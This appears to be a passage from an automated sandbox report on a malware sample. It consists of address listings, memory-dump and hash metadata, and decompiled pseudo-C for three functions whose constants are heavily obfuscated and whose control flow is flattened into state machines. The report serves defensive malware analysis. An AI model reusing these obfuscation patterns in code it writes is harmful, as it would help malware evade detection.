                                                      0x00239a70
                                                      0x00239a77
                                                      0x00239a7e
                                                      0x00239a85
                                                      0x00239a8c
                                                      0x00239a93
                                                      0x00239a97
                                                      0x00239aa4
                                                      0x00239aa7
                                                      0x00239aaa
                                                      0x00239ab1
                                                      0x00239ab8
                                                      0x00239abf
                                                      0x00239ac6
                                                      0x00239acd
                                                      0x00239ad4
                                                      0x00239adf
                                                      0x00239ae2
                                                      0x00239ae9
                                                      0x00239af0
                                                      0x00239af7
                                                      0x00239afe
                                                      0x00239b09
                                                      0x00239b0c
                                                      0x00239b10
                                                      0x00239b17
                                                      0x00239b1e
                                                      0x00239b22
                                                      0x00239b29
                                                      0x00239b34
                                                      0x00239b37
                                                      0x00239b45
                                                      0x00239b48
                                                      0x00239b4f
                                                      0x00239b59
                                                      0x00239b5c
                                                      0x00239b5f
                                                      0x00239b66
                                                      0x00239b6d
                                                      0x00239b74
                                                      0x00239b7b
                                                      0x00239b82
                                                      0x00239b89
                                                      0x00239b90
                                                      0x00239b97
                                                      0x00239b9e
                                                      0x00239ba5
                                                      0x00239bac
                                                      0x00239bb3
                                                      0x00239bba
                                                      0x00239bc1
                                                      0x00239bc8
                                                      0x00239bcf
                                                      0x00239bd6
                                                      0x00239bdf
                                                      0x00239be6
                                                      0x00239bed
                                                      0x00239bf4
                                                      0x00239bf8
                                                      0x00239bff
                                                      0x00239c06
                                                      0x00239c13
                                                      0x00239c16
                                                      0x00239c19
                                                      0x00239c20
                                                      0x00239c27
                                                      0x00239c2e
                                                      0x00239c32
                                                      0x00239c39
                                                      0x00239c47
                                                      0x00239c4a
                                                      0x00239c51
                                                      0x00239c58
                                                      0x00239c5f
                                                      0x00239c69
                                                      0x00239c6e
                                                      0x00239c76
                                                      0x00239c7b
                                                      0x00239c80
                                                      0x00239c87
                                                      0x00239c8e
                                                      0x00239c95
                                                      0x00239c9c
                                                      0x00239ca7
                                                      0x00239ca8
                                                      0x00239cab
                                                      0x00239cb2
                                                      0x00239cb9
                                                      0x00239cbd
                                                      0x00239cc4
                                                      0x00239ccb
                                                      0x00239cd2
                                                      0x00239cd9
                                                      0x00239ce0
                                                      0x00239ce7
                                                      0x00239ceb
                                                      0x00239cef
                                                      0x00239cf6
                                                      0x00239cfd
                                                      0x00239d09
                                                      0x00239d0c
                                                      0x00239d13
                                                      0x00239d1a
                                                      0x00239d25
                                                      0x00239d28
                                                      0x00239d2f
                                                      0x00239d36
                                                      0x00239d3d
                                                      0x00239d41
                                                      0x00239d48
                                                      0x00239d4f
                                                      0x00239d56
                                                      0x00239d5d
                                                      0x00239d64
                                                      0x00239d68
                                                      0x00239d6f
                                                      0x00239d76
                                                      0x00239d7d
                                                      0x00239d84
                                                      0x00239d8b
                                                      0x00239d92
                                                      0x00239d96
                                                      0x00239d9d
                                                      0x00239da8
                                                      0x00239dab
                                                      0x00239daf
                                                      0x00239daf
                                                      0x00239db6
                                                      0x00239db6
                                                      0x00239db6
                                                      0x00239db6
                                                      0x00239dbc
                                                      0x00000000
                                                      0x00000000
                                                      0x00239dc2
                                                      0x00239ee5
                                                      0x00239eea
                                                      0x00239eed
                                                      0x00000000
                                                      0x00239dc8
                                                      0x00239dce
                                                      0x00239ebf
                                                      0x00239ec4
                                                      0x00239ec7
                                                      0x00000000
                                                      0x00239dd4
                                                      0x00239dda
                                                      0x00239e9a
                                                      0x00239e9d
                                                      0x00239ea2
                                                      0x00000000
                                                      0x00239de0
                                                      0x00239de6
                                                      0x00239e79
                                                      0x00239e88
                                                      0x00239e8d
                                                      0x00239e90
                                                      0x00000000
                                                      0x00239dec
                                                      0x00239df2
                                                      0x00239e55
                                                      0x00239e64
                                                      0x00239e69
                                                      0x00239e6c
                                                      0x00000000
                                                      0x00239df4
                                                      0x00239dfa
                                                      0x00239e32
                                                      0x00239e37
                                                      0x00239e3c
                                                      0x00239e3f
                                                      0x00239e40
                                                      0x00239e42
                                                      0x00239e48
                                                      0x00000000
                                                      0x00239e48
                                                      0x00239dfc
                                                      0x00239e02
                                                      0x00000000
                                                      0x00239e08
                                                      0x00239e0b
                                                      0x00239e1a
                                                      0x00239e1f
                                                      0x00239e22
                                                      0x00000000
                                                      0x00239e22
                                                      0x00239e02
                                                      0x00239dfa
                                                      0x00239df2
                                                      0x00239de6
                                                      0x00239dda
                                                      0x00239dce
                                                      0x00239f45
                                                      0x00239f47
                                                      0x00239f4b
                                                      0x00239f4b
                                                      0x00239f52
                                                      0x00239f52
                                                      0x00239ef7
                                                      0x00239efd
                                                      0x00239fbe
                                                      0x00239fc3
                                                      0x00239fc6
                                                      0x00000000
                                                      0x00239f03
                                                      0x00239f03
                                                      0x00239f09
                                                      0x00239fa1
                                                      0x00239fa4
                                                      0x00000000
                                                      0x00239f0f
                                                      0x00239f0f
                                                      0x00239f15
                                                      0x00239f88
                                                      0x00239f8d
                                                      0x00239f90
                                                      0x00000000
                                                      0x00239f17
                                                      0x00239f17
                                                      0x00239f1d
                                                      0x00239f65
                                                      0x00239f6a
                                                      0x00239f6d
                                                      0x00000000
                                                      0x00239f1f
                                                      0x00239f1f
                                                      0x00239f25
                                                      0x00000000
                                                      0x00239f2b
                                                      0x00239f3d
                                                      0x00239f42
                                                      0x00239f25
                                                      0x00239f1d
                                                      0x00239f15
                                                      0x00239f09
                                                      0x00000000
                                                      0x00239fcb
                                                      0x00239fcb
                                                      0x00239fcb
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 'Vj
                                                      • API String ID: 0-2210790371
                                                      • Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                                      • Instruction ID: 2a01e980c180af9460aa1de851f2b51b45cdc2a622f8b1d539ce2b9d131d501b
                                                      • Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                                      • Instruction Fuzzy Hash: D1F132B2C1031ADBDF18DFE5C98A9DEBBB1FB04314F248159D416BA2A0D7B41A95CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00241BDF, Relevance: 1.5, Strings: 1, Instructions: 283COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00241BDF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t303;
				void* _t311;
				void* _t314;
				void* _t315;
				intOrPtr _t347;
				void* _t348;
				short* _t349;
				void* _t350;
				short* _t351;
				short* _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				void* _t365;

				_t347 =  *0x24ca2c; // 0x698300
				_v48 = 0xd714;
				_t348 = _t347 + 0x230;
				_v48 = _v48 ^ 0xcd668ab2;
				_t315 = 0x3a31b660;
				_v48 = _v48 | 0x2f181106;
				_v48 = _v48 ^ 0xef7e1823;
				_v84 = 0x5d44;
				_t353 = 0x2d;
				_v84 = _v84 / _t353;
				_v84 = _v84 ^ 0x00001499;
				_v28 = 0xf70b;
				_t354 = 0xd;
				_v28 = _v28 / _t354;
				_v28 = _v28 | 0x6a0646bd;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x35037bad;
				_v24 = 0xed7c;
				_v24 = _v24 + 0xffff8d1e;
				_v24 = _v24 + 0xffff0c72;
				_t355 = 0x48;
				_v24 = _v24 / _t355;
				_v24 = _v24 ^ 0x038e22ac;
				_v64 = 0x5fc5;
				_v64 = _v64 >> 4;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x000058c3;
				_v92 = 0x2688;
				_v92 = _v92 | 0xea27999c;
				_v92 = _v92 ^ 0xea278961;
				_v96 = 0x4a14;
				_t356 = 0x1f;
				_v96 = _v96 / _t356;
				_v96 = _v96 ^ 0x0000119a;
				_v36 = 0xd568;
				_v36 = _v36 ^ 0xbcd770ac;
				_v36 = _v36 << 6;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xe97134d4;
				_v68 = 0xedd2;
				_t357 = 0x63;
				_v68 = _v68 * 0x5e;
				_v68 = _v68 + 0xde9c;
				_v68 = _v68 ^ 0x00587d35;
				_v32 = 0x24d4;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2e569407;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x9e03fcb0;
				_v104 = 0x1c4d;
				_v104 = _v104 + 0xfffffff9;
				_v104 = _v104 ^ 0x00005633;
				_v40 = 0xb450;
				_v40 = _v40 + 0x94db;
				_v40 = _v40 | 0x3dcacfe3;
				_v40 = _v40 / _t357;
				_v40 = _v40 ^ 0x009f9709;
				_v100 = 0x6d07;
				_t358 = 0x45;
				_v100 = _v100 * 0x69;
				_v100 = _v100 ^ 0x002cf62e;
				_v72 = 0x5e87;
				_v72 = _v72 / _t358;
				_v72 = _v72 + 0xffff9f14;
				_v72 = _v72 ^ 0xffffe852;
				_v56 = 0x964f;
				_v56 = _v56 << 0xd;
				_v56 = _v56 + 0x58a7;
				_v56 = _v56 ^ 0x12ca7579;
				_v8 = 0x11e7;
				_t359 = 0x26;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 7;
				_v8 = _v8 / _t359;
				_v8 = _v8 ^ 0x001dbdc0;
				_v52 = 0x5afe;
				_t360 = 0x23;
				_v52 = _v52 * 0x24;
				_v52 = _v52 / _t360;
				_v52 = _v52 ^ 0x00001a55;
				_v88 = 0xb83d;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x00006413;
				_v20 = 0x5af3;
				_t361 = 0x3a;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 + 0x6d49;
				_v20 = _v20 ^ 0x8eb5ed48;
				_v20 = _v20 ^ 0x8e93dded;
				_v16 = 0x70c;
				_v16 = _v16 / _t361;
				_v16 = _v16 + 0xffff5089;
				_v16 = _v16 | 0x770f0b4d;
				_v16 = _v16 ^ 0xffff12de;
				_v60 = 0xa79c;
				_v60 = _v60 | 0xbac1c5ec;
				_v60 = _v60 + 0x6b12;
				_v60 = _v60 ^ 0xbac228f9;
				_v12 = 0x5546;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x001372eb;
				_v80 = 0x25db;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 3;
				_v80 = _v80 ^ 0x25db4552;
				_v44 = 0xe1b0;
				_v44 = _v44 + 0xffff2f0e;
				_v44 = _v44 | 0x46f5308b;
				_v44 = _v44 * 0x56;
				_v44 = _v44 ^ 0xd65e5bab;
				_v108 = 0x5856;
				_v108 = _v108 ^ 0x78cd5bef;
				_v108 = _v108 ^ 0x78cd26cd;
				_v76 = 0xfba5;
				_v76 = _v76 + 0xffff77ce;
				_t362 = 0x11;
				_v76 = _v76 / _t362;
				_v76 = _v76 ^ 0x00005641;
				_t314 = 2;
				do {
					while(_t315 != 0x1de3f48) {
						if(_t315 == 0x1f19b69e) {
							_t363 = E002378A5(_t315, _t315, 0x10, _t315, 4);
							E00237787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
							_t350 = _t348 + _t314;
							E00237787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
							_t365 = _t365 + 0x40;
							_t351 = _t350 + _t363 * 2;
							_t315 = 0x344e60d4;
							_t303 = 0x5c;
							 *_t351 = _t303;
							_t348 = _t351 + _t314;
							continue;
						} else {
							if(_t315 == 0x344e60d4) {
								_t364 = E002378A5(_t315, _t315, 0x10, _t315, 4);
								E00237787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
								_t365 = _t365 + 0x28;
								_t352 = _t348 + _t364 * 2;
								_t315 = 0x1de3f48;
								_t311 = 0x2e;
								 *_t352 = _t311;
								_t348 = _t352 + _t314;
								continue;
							} else {
								if(_t315 == 0x3a31b660) {
									_t311 = E00248C8F(_t315);
									_v112 = _t311;
									_t315 = 0x1f19b69e;
									continue;
								}
							}
						}
						goto L9;
					}
					E00237787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
					_t349 = _t348 + 6;
					_t365 = _t365 + 0x18;
					_t315 = 0x2228f3b5;
					 *_t349 = 0;
					_t348 = _t349 + _t314;
					L9:
				} while (_t315 != 0x2228f3b5);
				return _t311;
			}





















































                                                      0x00241be8
                                                      0x00241bf0
                                                      0x00241bf7
                                                      0x00241bfd
                                                      0x00241c04
                                                      0x00241c09
                                                      0x00241c10
                                                      0x00241c17
                                                      0x00241c23
                                                      0x00241c28
                                                      0x00241c2d
                                                      0x00241c34
                                                      0x00241c3e
                                                      0x00241c43
                                                      0x00241c48
                                                      0x00241c4f
                                                      0x00241c52
                                                      0x00241c59
                                                      0x00241c60
                                                      0x00241c67
                                                      0x00241c71
                                                      0x00241c76
                                                      0x00241c7b
                                                      0x00241c82
                                                      0x00241c89
                                                      0x00241c8d
                                                      0x00241c90
                                                      0x00241c97
                                                      0x00241c9e
                                                      0x00241ca5
                                                      0x00241cac
                                                      0x00241cb6
                                                      0x00241cbb
                                                      0x00241cc0
                                                      0x00241cc7
                                                      0x00241cce
                                                      0x00241cd5
                                                      0x00241cd9
                                                      0x00241cdd
                                                      0x00241ce4
                                                      0x00241cef
                                                      0x00241cf0
                                                      0x00241cf3
                                                      0x00241cfa
                                                      0x00241d01
                                                      0x00241d08
                                                      0x00241d0c
                                                      0x00241d13
                                                      0x00241d17
                                                      0x00241d1e
                                                      0x00241d25
                                                      0x00241d29
                                                      0x00241d30
                                                      0x00241d37
                                                      0x00241d3e
                                                      0x00241d4a
                                                      0x00241d4d
                                                      0x00241d54
                                                      0x00241d63
                                                      0x00241d66
                                                      0x00241d69
                                                      0x00241d70
                                                      0x00241d7e
                                                      0x00241d81
                                                      0x00241d88
                                                      0x00241d8f
                                                      0x00241d96
                                                      0x00241d9a
                                                      0x00241da1
                                                      0x00241da8
                                                      0x00241db3
                                                      0x00241db6
                                                      0x00241db9
                                                      0x00241dc4
                                                      0x00241dc7
                                                      0x00241dce
                                                      0x00241dd9
                                                      0x00241ddc
                                                      0x00241de6
                                                      0x00241de9
                                                      0x00241df0
                                                      0x00241df7
                                                      0x00241dfb
                                                      0x00241e02
                                                      0x00241e0d
                                                      0x00241e0e
                                                      0x00241e11
                                                      0x00241e18
                                                      0x00241e1f
                                                      0x00241e26
                                                      0x00241e32
                                                      0x00241e35
                                                      0x00241e3c
                                                      0x00241e43
                                                      0x00241e4a
                                                      0x00241e51
                                                      0x00241e58
                                                      0x00241e5f
                                                      0x00241e66
                                                      0x00241e6d
                                                      0x00241e71
                                                      0x00241e79
                                                      0x00241e7c
                                                      0x00241e83
                                                      0x00241e8a
                                                      0x00241e8e
                                                      0x00241e92
                                                      0x00241e99
                                                      0x00241ea0
                                                      0x00241ea7
                                                      0x00241eb2
                                                      0x00241eb5
                                                      0x00241ebc
                                                      0x00241ec3
                                                      0x00241eca
                                                      0x00241ed1
                                                      0x00241ed8
                                                      0x00241ee6
                                                      0x00241eeb
                                                      0x00241eee
                                                      0x00241ef5
                                                      0x00241ef6
                                                      0x00241ef6
                                                      0x00241f08
                                                      0x00241f99
                                                      0x00241fac
                                                      0x00241fb1
                                                      0x00241fc8
                                                      0x00241fcd
                                                      0x00241fd0
                                                      0x00241fd3
                                                      0x00241fda
                                                      0x00241fdb
                                                      0x00241fde
                                                      0x00000000
                                                      0x00241f0a
                                                      0x00241f10
                                                      0x00241f4e
                                                      0x00241f61
                                                      0x00241f66
                                                      0x00241f69
                                                      0x00241f6c
                                                      0x00241f73
                                                      0x00241f74
                                                      0x00241f77
                                                      0x00000000
                                                      0x00241f12
                                                      0x00241f18
                                                      0x00241f24
                                                      0x00241f29
                                                      0x00241f2c
                                                      0x00000000
                                                      0x00241f2c
                                                      0x00241f18
                                                      0x00241f10
                                                      0x00000000
                                                      0x00241f08
                                                      0x00241ffb
                                                      0x00242000
                                                      0x00242005
                                                      0x00242008
                                                      0x0024200d
                                                      0x00242010
                                                      0x00242012
                                                      0x00242012
                                                      0x00242024

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5}X
                                                      • API String ID: 0-583016468
                                                      • Opcode ID: 41f23d691eded75a4c5d26948b97aef5649f4da60e163df8d87d3f6fd7295143
                                                      • Instruction ID: 48f39576d59cc28e0cb94ab9f27c8200e0cde33933494a9c14db3c91316877e3
                                                      • Opcode Fuzzy Hash: 41f23d691eded75a4c5d26948b97aef5649f4da60e163df8d87d3f6fd7295143
                                                      • Instruction Fuzzy Hash: 4CD12271D10319EBDB18CFE5C88A9DEBBB1FF44314F208019E512BA2A0D7B91A56CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002362A3, Relevance: 1.4, Strings: 1, Instructions: 178COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 89%
                                                      			E002362A3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				char _v1128;
				void* _t179;
				void* _t180;
				intOrPtr _t182;
				void* _t190;
				intOrPtr _t206;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;

				_v88 = 0xf2dad;
				_t209 = 0;
				_t190 = 0x374ac1da;
				_v84 = _v84 & 0;
				_v40 = 0xb12b;
				_v40 = _v40 << 0xe;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000058bc;
				_v60 = 0xf727;
				_t210 = 0x4f;
				_v60 = _v60 / _t210;
				_v60 = _v60 ^ 0x00007065;
				_v8 = 0x9eec;
				_v8 = _v8 + 0xd770;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x00000fb6;
				_v44 = 0x7887;
				_v44 = _v44 << 5;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x00001109;
				_v16 = 0xef0c;
				_t211 = 0x7a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0xca26cbdc;
				_v16 = _v16 | 0x7bdc5f23;
				_v16 = _v16 ^ 0xfbfc55fd;
				_v76 = 0xd8b4;
				_v76 = _v76 + 0x9c32;
				_v76 = _v76 ^ 0x00017966;
				_v36 = 0x1b76;
				_v36 = _v36 + 0x8638;
				_v36 = _v36 | 0x465c0394;
				_v36 = _v36 ^ 0x465cdef1;
				_v28 = 0xf8c7;
				_v28 = _v28 ^ 0x90f840f6;
				_v28 = _v28 / _t211;
				_v28 = _v28 ^ 0x01300a73;
				_v80 = 0x4878;
				_v80 = _v80 ^ 0xf33f81bb;
				_v80 = _v80 ^ 0xf33fed7c;
				_v12 = 0x5e32;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0xb939d170;
				_v12 = _v12 + 0xffffe46d;
				_v12 = _v12 ^ 0xb939c5f3;
				_v72 = 0xdcc7;
				_t212 = 5;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00000998;
				_v52 = 0xf409;
				_v52 = _v52 >> 7;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x00002b61;
				_v20 = 0x5cd8;
				_v20 = _v20 + 0x5908;
				_v20 = _v20 * 0x1c;
				_v20 = _v20 * 0x14;
				_v20 = _v20 ^ 0x018d9ab8;
				_v32 = 0x162d;
				_v32 = _v32 + 0xffff1b5c;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x1fff9926;
				_v64 = 0x95af;
				_v64 = _v64 + 0xffff7063;
				_v64 = _v64 ^ 0x00004670;
				_v56 = 0xeead;
				_v56 = _v56 + 0xffffd284;
				_v56 = _v56 ^ 0x94a6c65a;
				_v56 = _v56 ^ 0x94a662be;
				_v68 = 0xa18;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x0000400d;
				_v48 = 0xd4d3;
				_v48 = _v48 * 3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0013dfa3;
				_v24 = 0x2d4a;
				_v24 = _v24 << 9;
				_v24 = _v24 + 0x17ff;
				_v24 = _v24 ^ 0x005aa30d;
				do {
					while(_t190 != 0x17ec002) {
						if(_t190 == 0x20702549) {
							_push(_v36);
							_t180 = E0024889D(0x24c930, _v76, __eflags);
							_t182 =  *0x24ca2c; // 0x698300
							_t206 =  *0x24ca2c; // 0x698300
							E002329E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
							E00242025(_v20, _t180, _v32, _v64);
							_t214 = _t214 + 0x30;
							_t190 = 0x17ec002;
							continue;
						} else {
							if(_t190 == 0x374ac1da) {
								_push(_t190);
								_push(_t190);
								E0023C6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
								_t214 = _t214 + 0x1c;
								_t190 = 0x20702549;
								continue;
							}
						}
						goto L7;
					}
					_push(_t190);
					_push(_v24);
					_push(0);
					_push(_v48);
					_push(0);
					_push(_v68);
					_push( &_v1128);
					_t179 = E0023568E(_v56, 0);
					_t214 = _t214 + 0x1c;
					__eflags = _t179;
					_t209 =  !=  ? 1 : _t209;
					_t190 = 0x3985ca2d;
					L7:
					__eflags = _t190 - 0x3985ca2d;
				} while (__eflags != 0);
				return _t209;
			}




































                                                      0x002362ac
                                                      0x002362b8
                                                      0x002362ba
                                                      0x002362bf
                                                      0x002362c2
                                                      0x002362c9
                                                      0x002362cd
                                                      0x002362d1
                                                      0x002362d8
                                                      0x002362e4
                                                      0x002362e9
                                                      0x002362ee
                                                      0x002362f5
                                                      0x002362fc
                                                      0x00236303
                                                      0x00236307
                                                      0x0023630b
                                                      0x00236312
                                                      0x00236319
                                                      0x0023631d
                                                      0x00236321
                                                      0x00236328
                                                      0x00236333
                                                      0x00236336
                                                      0x00236339
                                                      0x00236340
                                                      0x00236347
                                                      0x0023634e
                                                      0x00236355
                                                      0x0023635c
                                                      0x00236363
                                                      0x0023636a
                                                      0x00236371
                                                      0x00236378
                                                      0x0023637f
                                                      0x00236386
                                                      0x00236394
                                                      0x00236397
                                                      0x0023639e
                                                      0x002363a5
                                                      0x002363ac
                                                      0x002363b3
                                                      0x002363ba
                                                      0x002363be
                                                      0x002363c5
                                                      0x002363cc
                                                      0x002363d3
                                                      0x002363dd
                                                      0x002363e0
                                                      0x002363e3
                                                      0x002363ea
                                                      0x002363f1
                                                      0x002363f5
                                                      0x002363f9
                                                      0x00236400
                                                      0x00236407
                                                      0x00236412
                                                      0x00236419
                                                      0x0023641c
                                                      0x00236423
                                                      0x0023642a
                                                      0x00236431
                                                      0x00236435
                                                      0x0023643c
                                                      0x00236448
                                                      0x0023644f
                                                      0x00236456
                                                      0x0023645d
                                                      0x00236464
                                                      0x0023646b
                                                      0x00236472
                                                      0x00236479
                                                      0x0023647d
                                                      0x00236484
                                                      0x0023648f
                                                      0x00236492
                                                      0x00236496
                                                      0x0023649d
                                                      0x002364a4
                                                      0x002364a8
                                                      0x002364af
                                                      0x002364b6
                                                      0x002364b6
                                                      0x002364c4
                                                      0x002364f7
                                                      0x00236502
                                                      0x0023651c
                                                      0x00236530
                                                      0x0023653c
                                                      0x0023654c
                                                      0x00236551
                                                      0x00236554
                                                      0x00000000
                                                      0x002364c6
                                                      0x002364cc
                                                      0x002364d2
                                                      0x002364d3
                                                      0x002364eb
                                                      0x002364f0
                                                      0x002364f3
                                                      0x00000000
                                                      0x002364f3
                                                      0x002364cc
                                                      0x00000000
                                                      0x002364c4
                                                      0x0023655e
                                                      0x0023655f
                                                      0x0023656a
                                                      0x0023656c
                                                      0x0023656f
                                                      0x00236571
                                                      0x00236577
                                                      0x00236578
                                                      0x0023657f
                                                      0x00236583
                                                      0x00236585
                                                      0x00236588
                                                      0x0023658d
                                                      0x0023658d
                                                      0x0023658d
                                                      0x002365a1

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I%p
                                                      • API String ID: 0-3985577374
                                                      • Opcode ID: 1ebaacfafbb8682e308955186b096315e6411cf54a78987b24709f6093b57f13
                                                      • Instruction ID: 405aef8c95797cb1f7e88075a49a34c9250c0f636685104075666483c38cc432
                                                      • Opcode Fuzzy Hash: 1ebaacfafbb8682e308955186b096315e6411cf54a78987b24709f6093b57f13
                                                      • Instruction Fuzzy Hash: 368136B1D0021DABDF18CFE5D94A9DEBBB5FB44318F208059E112B62A0D7B80A09CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00240D33, Relevance: 1.4, Strings: 1, Instructions: 122COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00240D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t128;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t173;
				signed int _t174;

				_push(_a12);
				_t173 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t128);
				_v8 = 0x6813;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xf4e07894;
				_v8 = _v8 | 0x641e1778;
				_v8 = _v8 ^ 0xf4fe1535;
				_v16 = 0x7d9d;
				_t155 = 0x16;
				_v16 = _v16 * 0x4d;
				_v16 = _v16 ^ 0x0025b62f;
				_v32 = 0xbd8b;
				_v32 = _v32 ^ 0xdfb27dce;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x0a2b09ce;
				_v28 = 0xad22;
				_t156 = 0x34;
				_v28 = _v28 * 0x47;
				_v28 = _v28 + 0x4161;
				_v28 = _v28 ^ 0x00307d44;
				_v36 = 0xa165;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x00006be3;
				_v12 = 0xca43;
				_v12 = _v12 << 7;
				_v12 = _v12 + 0x4480;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00004998;
				_v44 = 0xc326;
				_v44 = _v44 / _t156;
				_v44 = _v44 ^ 0x000051cc;
				_v40 = 0xa768;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00002cdd;
				_v24 = 0x8f0;
				_v24 = _v24 << 2;
				_v24 = _v24 + 0xffff08f5;
				_v24 = _v24 | 0x28f06395;
				_v24 = _v24 ^ 0xffff76ac;
				_v20 = 0x26e;
				_v20 = _v20 + 0xffffc9ca;
				_v20 = _v20 + 0x3d88;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x00008c1f;
				_v48 = E00248C8F(_t156);
				_v8 = 0xba8c;
				_v8 = _v8 + 0xffff546f;
				_v8 = _v8 | 0xb28855c5;
				_v8 = _v8 ^ 0xa47da239;
				_v8 = _v8 ^ 0x16f5fdc2;
				_v16 = 0x4025;
				_t157 = 0xb;
				_v16 = _v16 / _t157;
				_v16 = _v16 + 0xffffba03;
				_t158 = 0x3b;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x0456c691;
				_t174 = E002378A5(_t158, _t158, _v16, _t158, _v8);
				E00237787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
				 *((short*)(_t173 + _t174 * 2)) = 0;
				return 0;
			}





















                                                      0x00240d3b
                                                      0x00240d3e
                                                      0x00240d40
                                                      0x00240d43
                                                      0x00240d47
                                                      0x00240d48
                                                      0x00240d4d
                                                      0x00240d57
                                                      0x00240d5d
                                                      0x00240d64
                                                      0x00240d6b
                                                      0x00240d72
                                                      0x00240d7f
                                                      0x00240d82
                                                      0x00240d85
                                                      0x00240d8c
                                                      0x00240d93
                                                      0x00240da1
                                                      0x00240da4
                                                      0x00240dab
                                                      0x00240db6
                                                      0x00240db7
                                                      0x00240dba
                                                      0x00240dc1
                                                      0x00240dc8
                                                      0x00240dcf
                                                      0x00240dd3
                                                      0x00240dda
                                                      0x00240de1
                                                      0x00240de5
                                                      0x00240dec
